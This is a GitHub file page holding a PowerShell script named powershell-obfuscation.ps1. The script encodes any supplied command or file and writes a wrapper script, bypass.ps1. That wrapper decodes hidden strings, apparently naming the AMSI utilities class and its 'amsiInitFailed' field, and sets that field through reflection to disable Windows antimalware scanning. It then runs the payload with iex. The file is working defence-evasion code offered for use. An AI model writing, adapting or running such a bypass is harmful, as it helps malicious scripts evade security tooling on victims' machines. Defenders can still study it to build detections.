-
Notifications
You must be signed in to change notification settings - Fork 81
Expand file tree
/
Copy pathpowershell-obfuscation.ps1
More file actions
56 lines (49 loc) · 1.83 KB
/
powershell-obfuscation.ps1
File metadata and controls
56 lines (49 loc) · 1.83 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
param([string] $c,[string] $f)
function encrypt($v){
$y = 9
while($y -gt 6){
[Byte[]]$t = $v.clone()
for ($x = 0; $x -lt $v.Count; $x++) {
$t[$v.Count-$x-1] = $v[$x] - 3
}
$v = $t
$y = $y - 1
}
return $v
}
$text1="[Byte[]]`$c = [System.Convert]::FromBase64String('"
$text2="')
[Byte[]]`$d = [System.Convert]::FromBase64String('amNga0xgamQ4JWVmYGtYZGZrbDgla2VcZFxeWGVYRCVkXGtqcEo=')
[Byte[]]`$e = [System.Convert]::FromBase64String('W1xjYFg9a2BlQGBqZFg=')
function O (`$v){
[Byte[]]`$t = `$v.clone()
for (`$x = 0; `$x -lt `$v.Count; `$x++) {
`$t[`$v.Count-`$x-1] = `$v[`$x] + 3
}
return `$t
}
`$y = 9
while(`$y -gt 6){
`$c = O(`$c)
`$d = O(`$d)
`$e = O(`$e)
`$y = `$y - 1
}
[Ref].Assembly.GetType([System.Text.Encoding]::ASCII.GetString(`$d)).GetField([System.Text.Encoding]::ASCII.GetString(`$e),'NonPublic,Static').SetValue(`$null,`$true)
iex([System.Text.Encoding]::ASCII.GetString(`$c))"
If(![String]::IsNullOrEmpty($c) -and [String]::IsNullOrEmpty($f)){
$result = encrypt([System.Text.Encoding]::ASCII.GetBytes($c))
write-output ($text1 + [Convert]::ToBase64String($result) + $text2) | out-file -filepath bypass.ps1
Write-Host("[+] obfuscation result has been saved in bypass.ps1")
}elseif(![String]::IsNullOrEmpty($f) -and [String]::IsNullOrEmpty($c)){
$stream = [System.IO.StreamReader]::new($f)
$file = ""
while( -not $stream.EndOfStream) {
$file = $file + $stream.ReadLine() + "`n"
}
$result = encrypt([System.Text.Encoding]::ASCII.GetBytes($file))
write-output ($text1 + [Convert]::ToBase64String($result) + $text2) | out-file -filepath bypass.ps1
Write-Host("[+] obfuscation result has been saved in bypass.ps1")
}else{
Write-Host("./powershell-obfuscation.ps1 [-c/-f] [command/filepath]")
}